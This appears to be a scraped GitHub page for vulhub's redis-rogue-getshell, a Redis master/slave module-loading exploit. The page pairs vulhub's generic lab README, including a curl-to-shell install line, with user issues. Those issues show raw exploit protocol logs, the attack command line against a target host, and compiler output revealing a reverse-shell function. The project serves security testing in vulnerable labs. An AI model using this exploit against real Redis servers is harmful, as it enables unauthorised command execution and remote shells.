vulhub / redis-rogue-getshell Goto Github PK

redis 4.x/5.x master/slave getshell module

License: Apache License 2.0

Makefile 1.38% C 93.60% C++ 1.56% Python 3.47%

redis-rogue-getshell's Introduction

Vulhub is an open-source collection of pre-built vulnerable docker environments. No pre-existing knowledge of docker is required, just execute two simple commands and you have a vulnerable environment.

中文版本(Chinese version)

Installation

Install Docker on Ubuntu 22.04:

# Install the latest version docker
curl -s https://get.docker.com/ | sh

# Run docker service
systemctl start docker

Note that as of April 2022, docker compose is merged into Docker as a subcommand as Docker Compose V2, the Python version of docker-compose will be deprecated after June 2023. So Vulhub will no longer require the installation of additional docker-compose, and all documentation will be modified to use the docker compose instead.

The installation steps of Docker and Docker Compose for other operating systems might be slightly different, please refer to the docker documentation for details.

Usage

# Download project
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master

# Enter the directory of vulnerability/environment
cd flask/ssti

# Compile environment
docker compose build

# Run environment
docker compose up -d

There is a README document in each environment directory, please read this file for vulnerability/environment testing and usage.

After the test, delete the environment with the following command.

docker compose down -v

It is recommended to use a VPS of at least 1GB memory to build a vulnerability environment. The your-ip mentioned in the documentation refers to the IP address of your VPS. If you are using a virtual machine, it refers to your virtual machine IP, not the IP inside the docker container.

All environments in this project are for testing purposes only and should not be used as a production environment!

Notice

To prevent permission errors, please ensure that the docker container has permission to access all files in the current directory.
Vulhub does not support running on machines with non-x86 architecture such as ARM for now.

Contribution

This project relies on docker. So any error during compilation and running are thrown by docker and related programs. Please find the cause of the error by yourself first. If it is determined that the dockerfile is written incorrectly (or the code is wrong in vulhub), then submit the issue. More details please 👉Common reasons for compilation failure, hope it can help you.

For more question, please contact:

Thanks for the following contributors:

More contributors：Contributors List

Partner

Our Partners and users:

Sponsor vulhub on patreon 🙏

Sponsor vulhub on opencollective 🙏

More Donate.

License

Vulhub is licensed under the MIT License. See LICENSE for the full license text.

redis-rogue-getshell's People

Contributors

Stargazers

Watchers

redis-rogue-getshell's Issues

Is it available in win?

OS: Windows

-ERR unknown command `system.exec`, with args beginning with: `id

I installed you tool on my mac (Darwin albert.local 18.7.0 Darwin Kernel Version 18.7.0: Mon Apr 27 20:09:39 PDT 2020; root:xnu-4903.278.35~1/RELEASE_X86_64 x86_64) and run command as you document with Python 3.7.7, then I got logs as below, could you give me some suggestions, Thank you

>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$12\r\n10.20.29.148\r\n$4\r\n8888\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'*1\r\n$4\r\nPING\r\n'
>> receive data: b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$5\r\n56379\r\n'
>> receive data: b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
>> receive data: b'*3\r\n$5\r\nPSYNC\r\n$40\r\n204811cefd7bc080eb8d5bb9686d6a3981fbd8d0\r\n$1\r\n1\r\n'
>> send data: b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
>> receive data: b'-ERR Error loading the extension. Please check the server logs.\r\n'
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*2\r\n$11\r\nsystem.exec\r\n$2\r\nid\r\n'
>> receive data: b'-ERR unknown command `system.exec`, with args beginning with: `id`, \r\n'
-ERR unknown command `system.exec`, with args beginning with: `id`,

>> send data: b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'
>> receive data: b'-ERR Error unloading module: no such module with that name\r\n'

use python3, not python

If I use python I get:
TypeError: super() argument 1 must be type, not classobj

with python3 it works fine

Also, the file path is:
-f ./RedisModulesSDK/exp/exp.so

Console message on make process on ubuntu 18.04

Hi, I have the next message when I do make, do you know if it is ok or is there any issue?

make -C ../rmutil
make[1]: Entering directory '/redis-rogue-getshell/RedisModulesSDK/rmutil'
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../   -c -o util.o util.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../   -c -o strings.o strings.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../   -c -o sds.o sds.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../   -c -o vector.o vector.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../   -c -o alloc.o alloc.c
gcc -g -fPIC -O3 -std=gnu99 -Wall -Wno-unused-function -I../   -c -o periodic.o periodic.c
ar rcs librmutil.a util.o strings.o sds.o vector.o alloc.o periodic.o
make[1]: Leaving directory '/redis-rogue-getshell/RedisModulesSDK/rmutil'
gcc -I../ -Wall -g -fPIC -lc -lm -std=gnu99     -c -o exp.o exp.c
exp.c: In function ‘DoCommand’:
exp.c:16:15: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
   char *cmd = RedisModule_StringPtrLen(argv[1], &cmd_len);
               ^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:23:8: warning: implicit declaration of function ‘strlen’ [-Wimplicit-function-declaration]
    if (strlen(buf) + strlen(output) >= size) {
        ^~~~~~
exp.c:23:8: warning: incompatible implicit declaration of built-in function ‘strlen’
exp.c:23:8: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
exp.c:27:4: warning: implicit declaration of function ‘strcat’ [-Wimplicit-function-declaration]
    strcat(output, buf);
    ^~~~~~
exp.c:27:4: warning: incompatible implicit declaration of built-in function ‘strcat’
exp.c:27:4: note: include ‘<string.h>’ or provide a declaration of ‘strcat’
exp.c:29:66: warning: incompatible implicit declaration of built-in function ‘strlen’
   RedisModuleString *ret = RedisModule_CreateString(ctx, output, strlen(output));
                                                                  ^~~~~~
exp.c:29:66: note: include ‘<string.h>’ or provide a declaration of ‘strlen’
exp.c: In function ‘RevShellCommand’:
exp.c:41:14: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
   char *ip = RedisModule_StringPtrLen(argv[1], &cmd_len);
              ^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:42:18: warning: initialization discards ‘const’ qualifier from pointer target type [-Wdiscarded-qualifiers]
   char *port_s = RedisModule_StringPtrLen(argv[2], &cmd_len);
                  ^~~~~~~~~~~~~~~~~~~~~~~~
exp.c:48:24: warning: implicit declaration of function ‘inet_addr’; did you mean ‘si_addr’? [-Wimplicit-function-declaration]
   sa.sin_addr.s_addr = inet_addr(ip);
                        ^~~~~~~~~
                        si_addr
exp.c:57:3: warning: null argument where non-null required (argument 2) [-Wnonnull]
   execve("/bin/sh", 0, 0);
   ^~~~~~
exp.c: In function ‘RedisModule_OnLoad’:
exp.c:68:5: warning: this ‘if’ clause does not guard... [-Wmisleading-indentation]
     if (RedisModule_CreateCommand(ctx, "system.exec",
     ^~
exp.c:71:2: note: ...this statement, but the latter is misleadingly indented as if it were guarded by the ‘if’
  if (RedisModule_CreateCommand(ctx, "system.rev",
  ^~
ld -o exp.so exp.o -shared -Bsymbolic  -L../rmutil -lrmutil -lc

Thanks in advance.

Connection refused

hello! Is there something wrong? thx!

root@ubuntu:/home/111/Downloads/redis-rogue-getshell-master# redis-cli -h 192.168.50.131192.168.50.131:6379> quit
root@ubuntu:/home/111/Downloads/redis-rogue-getshell-master# python3 redis-master.py -r 192.168.50.131 -p 6379 -L 192.168.50.198 -p 8888 -f RedisModulesSDK/exp.so -c "id"
Traceback (most recent call last):
File "redis-master.py", line 143, in
main()
File "redis-master.py", line 139, in main
exploit(options.rhost, options.rport, options.lhost, options.lport, filename, options.command, options.auth)
File "redis-master.py", line 94, in exploit
client = RedisClient(rhost, rport)
File "redis-master.py", line 54, in init
self.client = socket.create_connection((rhost, rport), timeout=10)
File "/usr/lib/python3.6/socket.py", line 724, in create_connection
raise err
File "/usr/lib/python3.6/socket.py", line 713, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused